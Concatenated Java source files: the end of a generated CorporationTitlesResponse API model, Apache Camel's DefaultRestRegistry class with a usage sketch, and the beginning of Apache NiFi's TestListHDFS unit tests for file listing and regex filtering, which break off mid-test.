@ApiModelProperty(example = "null", value = "roles_at_other array")
public List<RolesAtOtherEnum> getRolesAtOther() {
return rolesAtOther;
}
public void setRolesAtOther(List<RolesAtOtherEnum> rolesAtOther) {
this.rolesAtOther = rolesAtOther;
}
public CorporationTitlesResponse titleId(Integer titleId) {
this.titleId = titleId;
return this;
}
/**
* title_id integer
*
* @return titleId
**/
@ApiModelProperty(example = "null", value = "title_id integer")
public Integer getTitleId() {
return titleId;
}
public void setTitleId(Integer titleId) {
this.titleId = titleId;
}
@Override
public boolean equals(java.lang.Object o) {
if (this == o) {
return true;
}
if (o == null || getClass() != o.getClass()) {
return false;
}
CorporationTitlesResponse corporationTitlesResponse = (CorporationTitlesResponse) o;
return Objects.equals(this.grantableRoles, corporationTitlesResponse.grantableRoles)
&& Objects.equals(this.grantableRolesAtBase, corporationTitlesResponse.grantableRolesAtBase)
&& Objects.equals(this.grantableRolesAtHq, corporationTitlesResponse.grantableRolesAtHq)
&& Objects.equals(this.grantableRolesAtOther, corporationTitlesResponse.grantableRolesAtOther)
&& Objects.equals(this.name, corporationTitlesResponse.name)
&& Objects.equals(this.roles, corporationTitlesResponse.roles)
&& Objects.equals(this.rolesAtBase, corporationTitlesResponse.rolesAtBase)
&& Objects.equals(this.rolesAtHq, corporationTitlesResponse.rolesAtHq)
&& Objects.equals(this.rolesAtOther, corporationTitlesResponse.rolesAtOther)
&& Objects.equals(this.titleId, corporationTitlesResponse.titleId);
}
@Override
public int hashCode() {
return Objects.hash(grantableRoles, grantableRolesAtBase, grantableRolesAtHq, grantableRolesAtOther, name,
roles, rolesAtBase, rolesAtHq, rolesAtOther, titleId);
}
@Override
public String toString() {
StringBuilder sb = new StringBuilder();
sb.append("class CorporationTitlesResponse {\n");
sb.append(" grantableRoles: ").append(toIndentedString(grantableRoles)).append("\n");
sb.append(" grantableRolesAtBase: ").append(toIndentedString(grantableRolesAtBase)).append("\n");
sb.append(" grantableRolesAtHq: ").append(toIndentedString(grantableRolesAtHq)).append("\n");
sb.append(" grantableRolesAtOther: ").append(toIndentedString(grantableRolesAtOther)).append("\n");
sb.append(" name: ").append(toIndentedString(name)).append("\n");
sb.append(" roles: ").append(toIndentedString(roles)).append("\n");
sb.append(" rolesAtBase: ").append(toIndentedString(rolesAtBase)).append("\n");
sb.append(" rolesAtHq: ").append(toIndentedString(rolesAtHq)).append("\n");
sb.append(" rolesAtOther: ").append(toIndentedString(rolesAtOther)).append("\n");
sb.append(" titleId: ").append(toIndentedString(titleId)).append("\n");
sb.append("}");
return sb.toString();
}
/**
* Convert the given object to string with each line indented by 4 spaces
* (except the first line).
*/
private String toIndentedString(java.lang.Object o) {
if (o == null) {
return "null";
}
return o.toString().replace("\n", "\n ");
}
}
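/*
 * Fluent usage sketch (illustrative, not produced by swagger-codegen): the model can be
 * populated through the builder-style setters defined above, for example:
 *
 *   CorporationTitlesResponse title = new CorporationTitlesResponse()
 *           .name("Chief Executive Officer")
 *           .titleId(1)
 *           .addRolesItem(CorporationTitlesResponse.RolesEnum.DIRECTOR)
 *           .addGrantableRolesItem(CorporationTitlesResponse.GrantableRolesEnum.ACCOUNTANT);
 *
 * During JSON deserialization, strings such as "Director" are mapped back to the enum
 * constants via the @JsonCreator fromValue(...) factory methods.
 */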
|
|
/**
* Licensed to the Apache Software Foundation (ASF) under one or more
* contributor license agreements. See the NOTICE file distributed with
* this work for additional information regarding copyright ownership.
* The ASF licenses this file to You under the Apache License, Version 2.0
* (the "License"); you may not use this file except in compliance with
* the License. You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*/
package org.apache.camel.impl;
import java.util.ArrayList;
import java.util.LinkedHashMap;
import java.util.List;
import java.util.Map;
import org.apache.camel.CamelContext;
import org.apache.camel.CamelContextAware;
import org.apache.camel.Consumer;
import org.apache.camel.Endpoint;
import org.apache.camel.Exchange;
import org.apache.camel.Producer;
import org.apache.camel.Route;
import org.apache.camel.RuntimeCamelException;
import org.apache.camel.Service;
import org.apache.camel.ServiceStatus;
import org.apache.camel.StatefulService;
import org.apache.camel.StaticService;
import org.apache.camel.component.rest.RestApiEndpoint;
import org.apache.camel.component.rest.RestEndpoint;
import org.apache.camel.spi.RestConfiguration;
import org.apache.camel.spi.RestRegistry;
import org.apache.camel.support.LifecycleStrategySupport;
import org.apache.camel.support.service.ServiceSupport;
import org.apache.camel.util.ObjectHelper;
public class DefaultRestRegistry extends ServiceSupport implements StaticService, RestRegistry, CamelContextAware {
private CamelContext camelContext;
private final Map<Consumer, RestService> registry = new LinkedHashMap<>();
private transient Producer apiProducer;
public void addRestService(Consumer consumer, String url, String baseUrl, String basePath, String uriTemplate, String method,
String consumes, String produces, String inType, String outType, String routeId, String description) {
RestServiceEntry entry = new RestServiceEntry(consumer, url, baseUrl, basePath, uriTemplate, method, consumes, produces, inType, outType, routeId, description);
registry.put(consumer, entry);
}
public void removeRestService(Consumer consumer) {
registry.remove(consumer);
}
@Override
public List<RestRegistry.RestService> listAllRestServices() {
return new ArrayList<>(registry.values());
}
@Override
public int size() {
return registry.size();
}
@Override
public String apiDocAsJson() {
// see if there is a rest-api endpoint which would be the case if rest api-doc has been explicit enabled
if (apiProducer == null) {
Endpoint restApiEndpoint = null;
Endpoint restEndpoint = null;
for (Map.Entry<String, Endpoint> entry : camelContext.getEndpointMap().entrySet()) {
String uri = entry.getKey();
if (uri.startsWith("rest-api:")) {
restApiEndpoint = entry.getValue();
break;
} else if (restEndpoint == null && uri.startsWith("rest:")) {
restEndpoint = entry.getValue();
}
}
if (restApiEndpoint == null && restEndpoint != null) {
// no rest-api has been explicit enabled, then we need to create it first
RestEndpoint rest = (RestEndpoint) restEndpoint;
String componentName = rest.getComponentName();
if (componentName != null) {
RestConfiguration config = camelContext.getRestConfiguration(componentName, true);
String apiComponent = config.getApiComponent() != null ? config.getApiComponent() : RestApiEndpoint.DEFAULT_API_COMPONENT_NAME;
String path = config.getApiContextPath() != null ? config.getApiContextPath() : "api-doc";
restApiEndpoint = camelContext.getEndpoint(String.format("rest-api:%s/%s?componentName=%s&apiComponentName=%s&contextIdPattern=#name#",
path, camelContext.getName(), componentName, apiComponent));
}
}
if (restApiEndpoint != null) {
// create the producer once and cache it so it can be reused
try {
apiProducer = restApiEndpoint.createProducer();
camelContext.addService(apiProducer, true);
} catch (Exception e) {
throw RuntimeCamelException.wrapRuntimeCamelException(e);
}
}
}
if (apiProducer != null) {
try {
Exchange dummy = apiProducer.getEndpoint().createExchange();
apiProducer.process(dummy);
String json = dummy.hasOut() ? dummy.getOut().getBody(String.class) : dummy.getIn().getBody(String.class);
return json;
} catch (Exception e) {
throw RuntimeCamelException.wrapRuntimeCamelException(e);
}
}
return null;
}
public CamelContext getCamelContext() {
return camelContext;
}
public void setCamelContext(CamelContext camelContext) {
this.camelContext = camelContext;
}
@Override
protected void doStart() throws Exception {
ObjectHelper.notNull(camelContext, "camelContext", this);
// add a lifecycle strategy so we can keep track of when consumers are removed, and unregister them from our registry
camelContext.addLifecycleStrategy(new RemoveRestServiceLifecycleStrategy());
}
@Override
protected void doStop() throws Exception {
registry.clear();
}
/**
* Represents a rest service
*/
private final class RestServiceEntry implements RestService {
private final Consumer consumer;
private final String url;
private final String baseUrl;
private final String basePath;
private final String uriTemplate;
private final String method;
private final String consumes;
private final String produces;
private final String inType;
private final String outType;
private final String routeId;
private final String description;
private RestServiceEntry(Consumer consumer, String url, String baseUrl, String basePath, String uriTemplate, String method,
String consumes, String produces, String inType, String outType, String routeId, String description) {
this.consumer = consumer;
this.url = url;
this.baseUrl = baseUrl;
this.basePath = basePath;
this.uriTemplate = uriTemplate;
this.method = method;
this.consumes = consumes;
this.produces = produces;
this.inType = inType;
this.outType = outType;
this.routeId = routeId;
this.description = description;
}
public Consumer getConsumer() {
return consumer;
}
public String getUrl() {
return url;
}
public String getBaseUrl() {
return baseUrl;
}
public String getBasePath() {
return basePath;
}
public String getUriTemplate() {
return uriTemplate;
}
public String getMethod() {
return method;
}
public String getConsumes() {
return consumes;
}
public String getProduces() {
return produces;
}
public String getInType() {
return inType;
}
public String getOutType() {
return outType;
}
public String getState() {
// must use String type to be sure remote JMX can read the attribute without requiring Camel classes.
ServiceStatus status = null;
if (consumer instanceof StatefulService) {
status = ((StatefulService) consumer).getStatus();
}
// if no status exists then it's stopped
if (status == null) {
status = ServiceStatus.Stopped;
}
return status.name();
}
public String getRouteId() {
return routeId;
}
public String getDescription() {
return description;
}
}
/**
* A {@link org.apache.camel.spi.LifecycleStrategy} that keeps track of when a {@link Consumer} is removed
* and automatically un-registers it from this REST registry.
*/
private final class RemoveRestServiceLifecycleStrategy extends LifecycleStrategySupport {
@Override
public void onServiceRemove(CamelContext context, Service service, Route route) {
super.onServiceRemove(context, service, route);
// if it's a consumer then de-register it from the rest registry
if (service instanceof Consumer) {
removeRestService((Consumer) service);
}
}
}
}
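// Hedged usage sketch for the registry above, assuming a started CamelContext is supplied by the
// caller; everything else uses only the API shown in DefaultRestRegistry and RestRegistry. It
// wires the registry to the context, lists the known REST services, and fetches the aggregated
// api-doc, which may be null when no rest/rest-api endpoint exists.
final class DefaultRestRegistryUsageSketch {
    private DefaultRestRegistryUsageSketch() {
    }
    static void printRestServices(CamelContext context) throws Exception {
        DefaultRestRegistry registry = new DefaultRestRegistry();
        registry.setCamelContext(context);
        context.addService(registry); // starting the registry installs the cleanup lifecycle strategy
        for (RestRegistry.RestService service : registry.listAllRestServices()) {
            System.out.println(service.getMethod() + " " + service.getUrl() + " (" + service.getState() + ")");
        }
        String apiDoc = registry.apiDocAsJson(); // null if no rest-api/rest endpoint is registered
        if (apiDoc != null) {
            System.out.println(apiDoc);
        }
    }
}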
|
|
/*
* Licensed to the Apache Software Foundation (ASF) under one or more
* contributor license agreements. See the NOTICE file distributed with
* this work for additional information regarding copyright ownership.
* The ASF licenses this file to You under the Apache License, Version 2.0
* (the "License"); you may not use this file except in compliance with
* the License. You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*/
package org.apache.nifi.processors.hadoop;
import static org.apache.nifi.processors.hadoop.ListHDFS.FILTER_DIRECTORIES_AND_FILES_VALUE;
import static org.apache.nifi.processors.hadoop.ListHDFS.FILTER_FILES_ONLY_VALUE;
import static org.apache.nifi.processors.hadoop.ListHDFS.FILTER_FULL_PATH_VALUE;
import static org.junit.Assert.assertEquals;
import static org.mockito.Mockito.mock;
import static org.mockito.Mockito.when;
import java.io.File;
import java.io.FileNotFoundException;
import java.io.IOException;
import java.net.URI;
import java.util.ArrayList;
import java.util.Date;
import java.util.HashMap;
import java.util.HashSet;
import java.util.List;
import java.util.Map;
import java.util.Set;
import java.util.concurrent.ConcurrentHashMap;
import java.util.concurrent.ConcurrentMap;
import java.util.concurrent.TimeUnit;
import java.util.regex.Matcher;
import java.util.regex.Pattern;
import org.apache.hadoop.conf.Configuration;
import org.apache.hadoop.fs.FSDataInputStream;
import org.apache.hadoop.fs.FSDataOutputStream;
import org.apache.hadoop.fs.FileStatus;
import org.apache.hadoop.fs.FileSystem;
import org.apache.hadoop.fs.Path;
import org.apache.hadoop.fs.permission.FsPermission;
import org.apache.hadoop.util.Progressable;
import org.apache.nifi.components.state.Scope;
import org.apache.nifi.controller.AbstractControllerService;
import org.apache.nifi.distributed.cache.client.Deserializer;
import org.apache.nifi.distributed.cache.client.DistributedMapCacheClient;
import org.apache.nifi.distributed.cache.client.Serializer;
import org.apache.nifi.hadoop.KerberosProperties;
import org.apache.nifi.reporting.InitializationException;
import org.apache.nifi.util.MockFlowFile;
import org.apache.nifi.util.NiFiProperties;
import org.apache.nifi.util.TestRunner;
import org.apache.nifi.util.TestRunners;
import org.junit.Assert;
import org.junit.Before;
import org.junit.Test;
public class TestListHDFS {
private TestRunner runner;
private ListHDFSWithMockedFileSystem proc;
private NiFiProperties mockNiFiProperties;
private KerberosProperties kerberosProperties;
@Before
public void setup() throws InitializationException {
mockNiFiProperties = mock(NiFiProperties.class);
when(mockNiFiProperties.getKerberosConfigurationFile()).thenReturn(null);
kerberosProperties = new KerberosProperties(null);
proc = new ListHDFSWithMockedFileSystem(kerberosProperties);
runner = TestRunners.newTestRunner(proc);
runner.setProperty(ListHDFS.HADOOP_CONFIGURATION_RESOURCES, "src/test/resources/core-site.xml");
runner.setProperty(ListHDFS.DIRECTORY, "/test");
}
@Test
public void testListingWithValidELFunction() throws InterruptedException {
proc.fileSystem.addFileStatus(new Path("/test"), new FileStatus(1L, false, 1, 1L, 0L, 0L, create777(), "owner", "group", new Path("/test/testFile.txt")));
runner.setProperty(ListHDFS.DIRECTORY, "${literal('/test'):substring(0,5)}");
// first iteration will not pick up files because it has to instead check timestamps.
// We must then wait long enough to ensure that the listing can be performed safely and
// run the Processor again.
runner.run();
Thread.sleep(TimeUnit.NANOSECONDS.toMillis(2 * ListHDFS.LISTING_LAG_NANOS));
runner.run();
runner.assertAllFlowFilesTransferred(ListHDFS.REL_SUCCESS, 1);
final MockFlowFile mff = runner.getFlowFilesForRelationship(ListHDFS.REL_SUCCESS).get(0);
mff.assertAttributeEquals("path", "/test");
mff.assertAttributeEquals("filename", "testFile.txt");
}
@Test
public void testListingWithFilter() throws InterruptedException {
proc.fileSystem.addFileStatus(new Path("/test"), new FileStatus(1L, false, 1, 1L, 0L, 0L, create777(), "owner", "group", new Path("/test/testFile.txt")));
runner.setProperty(ListHDFS.DIRECTORY, "${literal('/test'):substring(0,5)}");
runner.setProperty(ListHDFS.FILE_FILTER, "[^test].*");
// first iteration will not pick up files because it has to instead check timestamps.
// We must then wait long enough to ensure that the listing can be performed safely and
// run the Processor again.
runner.run();
Thread.sleep(TimeUnit.NANOSECONDS.toMillis(2 * ListHDFS.LISTING_LAG_NANOS));
runner.run();
runner.assertAllFlowFilesTransferred(ListHDFS.REL_SUCCESS, 0);
}
@Test
public void testListingWithInvalidELFunction() throws InterruptedException {
runner.setProperty(ListHDFS.DIRECTORY, "${literal('/test'):foo()}");
runner.assertNotValid();
}
@Test
public void testListingWithUnrecognizedELFunction() throws InterruptedException {
proc.fileSystem.addFileStatus(new Path("/test"), new FileStatus(1L, false, 1, 1L, 0L, 0L, create777(), "owner", "group", new Path("/test/testFile.txt")));
runner.setProperty(ListHDFS.DIRECTORY, "data_${literal('testing'):substring(0,4)%7D");
// first iteration will not pick up files because it has to instead check timestamps.
// We must then wait long enough to ensure that the listing can be performed safely and
// run the Processor again.
runner.run();
Thread.sleep(TimeUnit.NANOSECONDS.toMillis(2 * ListHDFS.LISTING_LAG_NANOS));
runner.run();
runner.assertAllFlowFilesTransferred(ListHDFS.REL_SUCCESS, 0);
}
@Test
public void testListingHasCorrectAttributes() throws InterruptedException {
proc.fileSystem.addFileStatus(new Path("/test"), new FileStatus(1L, false, 1, 1L, 0L, 0L, create777(), "owner", "group", new Path("/test/testFile.txt")));
// first iteration will not pick up files because it has to instead check timestamps.
// We must then wait long enough to ensure that the listing can be performed safely and
// run the Processor again.
runner.run();
Thread.sleep(TimeUnit.NANOSECONDS.toMillis(2 * ListHDFS.LISTING_LAG_NANOS));
runner.run();
runner.assertAllFlowFilesTransferred(ListHDFS.REL_SUCCESS, 1);
final MockFlowFile mff = runner.getFlowFilesForRelationship(ListHDFS.REL_SUCCESS).get(0);
mff.assertAttributeEquals("path", "/test");
mff.assertAttributeEquals("filename", "testFile.txt");
}
@Test
public void testRecursiveWithDefaultFilterAndFilterMode() throws InterruptedException {
proc.fileSystem.addFileStatus(new Path("/test"), new FileStatus(1L, false, 1, 1L, 0L, 0L, create777(), "owner", "group", new Path("/test/.testFile.txt")));
proc.fileSystem.addFileStatus(new Path("/test"), new FileStatus(1L, false, 1, 1L, 0L, 0L, create777(), "owner", "group", new Path("/test/testFile.txt")));
proc.fileSystem.addFileStatus(new Path("/test"), new FileStatus(1L, true, 1, 1L, 0L, 0L, create777(), "owner", "group", new Path("/test/testDir")));
proc.fileSystem.addFileStatus(new Path("/test/testDir"), new FileStatus(1L, false, 1, 1L, 0L, 0L, create777(), "owner", "group", new Path("/test/testDir/1.txt")));
// first iteration will not pick up files because it has to instead check timestamps.
// We must then wait long enough to ensure that the listing can be performed safely and
// run the Processor again.
runner.run();
Thread.sleep(TimeUnit.NANOSECONDS.toMillis(2 * ListHDFS.LISTING_LAG_NANOS));
runner.run();
runner.assertAllFlowFilesTransferred(ListHDFS.REL_SUCCESS, 2);
final List<MockFlowFile> flowFiles = runner.getFlowFilesForRelationship(ListHDFS.REL_SUCCESS);
for (int i=0; i < 2; i++) {
final MockFlowFile ff = flowFiles.get(i);
final String filename = ff.getAttribute("filename");
if (filename.equals("testFile.txt")) {
ff.assertAttributeEquals("path", "/test");
} else if ( filename.equals("1.txt")) {
ff.assertAttributeEquals("path", "/test/testDir");
} else {
Assert.fail("filename was " + filename);
}
}
}
@Test
public void testRecursiveWithCustomFilterDirectoriesAndFiles() throws InterruptedException, IOException {
// set custom regex filter and filter mode
runner.setProperty(ListHDFS.FILE_FILTER, ".*txt.*");
runner.setProperty(ListHDFS.FILE_FILTER_MODE, FILTER_DIRECTORIES_AND_FILES_VALUE.getValue());
proc.fileSystem.addFileStatus(new Path("/test"), new FileStatus(1L, false, 1, 1L, 0L, 0L, create777(), "owner", "group", new Path("/test/testFile.out")));
proc.fileSystem.addFileStatus(new Path("/test"), new FileStatus(1L, false, 1, 1L, 0L, 0L, create777(), "owner", "group", new Path("/test/testFile.txt")));
proc.fileSystem.addFileStatus(new Path("/test"), new FileStatus(1L, true, 1, 1L, 0L, 0L, create777(), "owner", "group", new Path("/test/testDir")));
proc.fileSystem.addFileStatus(new Path("/test/testDir"), new FileStatus(1L, false, 1, 1L, 0L, 0L, create777(), "owner", "group", new Path("/test/testDir/1.txt")));
proc.fileSystem.addFileStatus(new Path("/test/testDir"), new FileStatus(1L, true, 1, 1L, 0L, 0L, create777(), "owner", "group", new Path("/test/testDir/anotherDir")));
proc.fileSystem.addFileStatus(new Path("/test/testDir/anotherDir"), new FileStatus(1L, false, 1, 1L, 0L, 0L, create777(), "owner", "group", new Path("/test/testDir/anotherDir/2.out")));
proc.fileSystem.addFileStatus(new Path("/test/testDir/anotherDir"), new FileStatus(1L, false, 1, 1L, 0L, 0L, create777(), "owner", "group", new Path("/test/testDir/anotherDir/2.txt")));
proc.fileSystem.addFileStatus(new Path("/test"), new FileStatus(1L, true, 1, 1L, 0L, 0L, create777(), "owner", "group", new Path("/test/txtDir")));
proc.fileSystem.addFileStatus(new Path("/test/txtDir"), new FileStatus(1L, false, 1, 1L, 0L, 0L, create777(), "owner", "group", new Path("/test/txtDir/3.out")));
proc.fileSystem.addFileStatus(new Path("/test/txtDir"), new FileStatus(1L, false, 1, 1L, 0L, 0L, create777(), "owner", "group", new Path("/test/txtDir/3.txt")));
// first iteration will not pick up files because it has to instead check timestamps.
// We must then wait long enough to ensure that the listing can be performed safely and
// run the Processor again.
runner.run();
Thread.sleep(TimeUnit.NANOSECONDS.toMillis(2 * ListHDFS.LISTING_LAG_NANOS));
runner.run();
runner.assertAllFlowFilesTransferred(ListHDFS.REL_SUCCESS, 2);
final List<MockFlowFile> flowFiles = runner.getFlowFilesForRelationship(ListHDFS.REL_SUCCESS);
for (int i = 0; i < 2; i++) {
final MockFlowFile ff = flowFiles.get(i);
final String filename = ff.getAttribute("filename");
if (filename.equals("testFile.txt")) {
ff.assertAttributeEquals("path", "/test");
} else if (filename.equals("3.txt")) {
ff.assertAttributeEquals("path", "/test/txtDir");
} else {
Assert.fail("filename was " + filename);
}
}
}
@Test
public void testRecursiveWithCustomFilterFilesOnly() throws InterruptedException, IOException {
// set custom regex filter and filter mode
runner.setProperty(ListHDFS.FILE_FILTER, "[^\\.].*\\.txt");
runner.setProperty(ListHDFS.FILE_FILTER_MODE, FILTER_FILES_ONLY_VALUE.getValue());
proc.fileSystem.addFileStatus(new Path("/test"), new FileStatus(1L, false, 1, 1L, 0L, 0L, create777(), "owner", "group", new Path("/test/testFile.out")));
proc.fileSystem.addFileStatus(new Path("/test"), new FileStatus(1L, false, 1, 1L, 0L, 0L, create777(), "owner", "group", new Path("/test/testFile.txt")));
proc.fileSystem.addFileStatus(new Path("/test"), new FileStatus(1L, false, 1, 1L, 0L, 0L, create777(), "owner", "group", new Path("/test/.partfile.txt")));
proc.fileSystem.addFileStatus(new Path("/test"), new FileStatus(1L, true, 1, 1L, 0L, 0L, create777(), "owner", "group", new Path("/test/testDir")));
proc.fileSystem.addFileStatus(new Path("/test/testDir"), new FileStatus(1L, false, 1, 1L, 0L, 0L, create777(), "owner", "group", new Path("/test/testDir/1.txt")));
proc.fileSystem.addFileStatus(new Path("/test/testDir"), new FileStatus(1L, true, 1, 1L, 0L, 0L, create777(), "owner", "group", new Path("/test/testDir/anotherDir")));
proc.fileSystem.addFileStatus(new Path("/test/testDir/anotherDir"), new FileStatus(1L, false, 1, 1L, 0L, 0L, create777(), "owner", "group", new Path("/test/testDir/anotherDir/.txt")));
proc.fileSystem.addFileStatus(new Path("/test/testDir/anotherDir"), new FileStatus(1L, false, 1, 1L, 0L, 0L, create777(), "owner", "group", new Path("/test/testDir/anotherDir/2.out")));
proc.fileSystem.addFileStatus(new Path("/test/testDir/anotherDir"), new FileStatus(1L, false, 1, 1L, 0L, 0L, create777(), "owner", "group", new Path("/test/testDir/anotherDir/2.txt")));
// first iteration will not pick up files because it has to instead check timestamps.
// We must then wait long enough to ensure that the listing can be performed safely and
// run the Processor again.
runner.run();
Thread.sleep(TimeUnit.NANOSECONDS.toMillis(2 * ListHDFS.LISTING_LAG_NANOS));
runner.run();
runner.assertAllFlowFilesTransferred(ListHDFS.REL_SUCCESS, 3);
final List<MockFlowFile> flowFiles = runner.getFlowFilesForRelationship(ListHDFS.REL_SUCCESS);
for (int i = 0; i < 3; i++) {
final MockFlowFile ff = flowFiles.get(i);
final String filename = ff.getAttribute("filename");
if (filename.equals("testFile.txt")) {
ff.assertAttributeEquals("path", "/test");
} else if (filename.equals("1.txt")) {
ff.assertAttributeEquals("path", "/test/testDir");
} else if (filename.equals("2.txt")) {
ff.assertAttributeEquals("path", "/test/testDir/anotherDir");
} else {
Assert.fail("filename was " + filename);
}
}
}
@Test
public void testRecursiveWithCustomFilterFullPath() throws InterruptedException, IOException {
// set custom regex filter and filter mode
runner.setProperty(ListHDFS.FILE_FILTER, "(/.*/)*anotherDir/1\\..*");
runner.setProperty(ListHDFS.FILE_FILTER_MODE, FILTER_FULL_PATH_VALUE.getValue());
proc.fileSystem.addFileStatus(new Path("/test"), new FileStatus(1L, false, 1, 1L, 0L, 0L, create777(), "owner", "group", new Path("/test/testFile.out")));
proc.fileSystem.addFileStatus(new Path("/test"), new FileStatus(1L, false, 1, 1L, 0L, 0L, create777(), "owner", "group", new Path("/test/testFile.txt")));
proc.fileSystem.addFileStatus(new Path("/test"), new FileStatus(1L, true, 1, 1L, 0L, 0L, create777(), "owner", "group", new Path("/test/testDir")));
proc.fileSystem.addFileStatus(new Path("/test/testDir"), new FileStatus(1L, false, 1, 1L, 0L, 0L, create777(), "owner", "group", new Path("/test/testDir/1.txt")));
proc.fileSystem.addFileStatus(new Path("/test/testDir"), new FileStatus(1L, true, 1, 1L, 0L, 0L, create777(), "owner", "group", new Path("/test/testDir/anotherDir")));
proc.fileSystem.addFileStatus(new Path("/test/testDir/anotherDir"), new FileStatus(1L, false, 1, 1L, 0L, 0L, create777(), "owner", "group", new Path("/test/testDir/anotherDir/1.out")));
proc.fileSystem.addFileStatus(new Path("/test/testDir/anotherDir"), new FileStatus(1L, false, 1, 1L, 0L, 0L, create777(), "owner", "group", new Path("/test/testDir/anotherDir/1.txt")));
proc.fileSystem.addFileStatus(new Path("/test/testDir/anotherDir"), new FileStatus(1L, false, 1, 1L, 0L, 0L, create777(), "owner", "group", new Path("/test/testDir/anotherDir/2.out")));
proc.fileSystem.addFileStatus(new Path("/test/testDir/anotherDir"), new FileStatus(1L, false, 1, 1L, 0L, 0L, create777(), "owner", "group", new Path("/test/testDir/anotherDir/2.txt")));
proc.fileSystem.addFileStatus(new Path("/test/testDir"), new FileStatus(1L, true, 1, 1L, 0L, 0L, create777(), "owner", "group", new Path("/test/testDir/someDir")));
proc.fileSystem.addFileStatus(new Path("/test/testDir/someDir"), new FileStatus(1L, false, 1, 1L, 0L, 0L, create777(), "owner", "group", new Path("/test/testDir/someDir/1.out")));
// first iteration will not pick up files because it has to instead check timestamps.
// We must then wait long enough to ensure that the listing can be performed safely and
// run the Processor again.
runner.run();
Thread.sleep(TimeUnit.NANOSECONDS.toMillis(2 * ListHDFS.LISTING_LAG_NANOS));
runner.run();
runner.assertAllFlowFilesTransferred(ListHDFS.REL_SUCCESS, 2);
final List<MockFlowFile> flowFiles = runner.getFlowFilesForRelationship(ListHDFS.REL_SUCCESS);
for (int i = 0; i < 2; i++) {
final MockFlowFile ff = flowFiles.get(i);
final String filename = ff.getAttribute("filename");
if (filename.equals("1.out")) {
ff.assertAttributeEquals("path", "/test/testDir/anotherDir");
} else if (filename.equals("1.txt")) {
ff.assertAttributeEquals("path", "/test/testDir/anotherDir");
} else {
Assert.fail("filename was " + filename);
}
}
}
@Test
public void testNotRecursive() throws InterruptedException {
runner.setProperty(ListHDFS.RECURSE_SUBDIRS, "false");
proc.fileSystem.addFileStatus(new Path("/test"), new FileStatus(1L, false, 1, 1L, 0L, 0L, create777(), "owner", "group", new Path("/test/testFile.txt")));
proc.fileSystem.addFileStatus(new Path("/test"), new FileStatus(1L, true, 1, 1L, 0L, 0L, create777(), "owner", "group", new Path("/test/testDir")));
proc.fileSystem.addFileStatus(new Path("/test/testDir"), new FileStatus(1L, false, 1, 1L, 0L, 0L, create777(), "owner", "group", new Path("/test/testDir/1.txt")));
// first iteration will not pick up files because it has to instead check timestamps.
// We must then wait long enough to ensure that the listing can be performed safely and
// run the Processor again.
runner.run();
Thread.sleep(TimeUnit.NANOSECONDS.toMillis(2 * ListHDFS.LISTING_LAG_NANOS));
runner.run();
runner.assertAllFlowFilesTransferred(ListHDFS.REL_SUCCESS, 1);
final MockFlowFile mff1 = runner.getFlowFilesForRelationship(ListHDFS.REL_SUCCESS).get(0);
mff1.assertAttributeEquals("path", "/test");
mff1.assertAttributeEquals("filename", "testFile.txt");
}
@Test
public void testNoListUntilUpdateFromRemoteOnPrimaryNodeChange() throws IOException, InterruptedException {
proc.fileSystem.addFileStatus(new Path("/test"), new FileStatus(1L, false, 1, 1L, 1999L, 0L, create777(), "owner", "group", new Path("/test/testFile.txt")));
// first iteration will not pick up files because it has to instead check timestamps.
// We must then wait long enough to ensure that the listing can be performed safely and
// run the Processor again.
runner.run();
Thread.sleep(TimeUnit.NANOSECONDS.toMillis(2 * ListHDFS.LISTING_LAG_NANOS));
runner.run();
runner.assertAllFlowFilesTransferred(ListHDFS.REL_SUCCESS, 1);
final MockFlowFile mff1 = runner.getFlowFilesForRelationship(ListHDFS.REL_SUCCESS).get(0);
mff1.assertAttributeEquals("path", "/test");
mff1.assertAttributeEquals("filename", "testFile.txt");
runner.clearTransferState();
// add new file to pull
proc.fileSystem.addFileStatus(new Path("/test"), new FileStatus(1L, false, 1, 1L, 2000L, 0L, create777(), "owner", "group", new Path("/test/testFile2.txt")));
runner.getStateManager().setFailOnStateGet(Scope.CLUSTER, true);
// Should fail to perform @OnScheduled methods.
try {
runner.run();
Assert.fail("Processor ran successfully");
} catch (final AssertionError e) {
}
runner.assertAllFlowFilesTransferred(ListHDFS.REL_SUCCESS, 0);
// Should fail to perform @OnScheduled methods.
try {
runner.run();
Assert.fail("Processor ran successfully");
} catch (final AssertionError e) {
}
runner.assertAllFlowFilesTransferred(ListHDFS.REL_SUCCESS, 0);
runner.getStateManager().setFailOnStateGet(Scope.CLUSTER, false);
Thread.sleep(TimeUnit.NANOSECONDS.toMillis(2 * ListHDFS.LISTING_LAG_NANOS));
runner.run();
runner.assertAllFlowFilesTransferred(ListHDFS.REL_SUCCESS, 0);
Map<String, String> newState = runner.getStateManager().getState(Scope.CLUSTER).toMap();
assertEquals("2000", newState.get(ListHDFS.LISTING_TIMESTAMP_KEY));
assertEquals("1999", newState.get(ListHDFS.EMITTED_TIMESTAMP_KEY));
Thread.sleep(TimeUnit.NANOSECONDS.toMillis(2 * ListHDFS.LISTING_LAG_NANOS));
runner.run();
newState = runner.getStateManager().getState(Scope.CLUSTER).toMap();
assertEquals("2000", newState.get(ListHDFS.LISTING_TIMESTAMP_KEY));
assertEquals("2000", newState.get(ListHDFS.EMITTED_TIMESTAMP_KEY));
runner.assertAllFlowFilesTransferred(ListHDFS.REL_SUCCESS, 1);
}
@Test
public void testOnlyNewestEntriesHeldBack() throws InterruptedException {
proc.fileSystem.addFileStatus(new Path("/test"), new FileStatus(1L, false, 1, 1L, 0L, 0L, create777(), "owner", "group", new Path("/test/testFile.txt")));
proc.fileSystem.addFileStatus(new Path("/test"), new FileStatus(1L, false, 1, 1L, 8L, 0L, create777(), "owner", "group", new Path("/test/testFile2.txt")));
// this is a directory, so it won't be counted toward the entries
proc.fileSystem.addFileStatus(new Path("/test"), new FileStatus(1L, true, 1, 1L, 8L, 0L, create777(), "owner", "group", new Path("/test/testDir")));
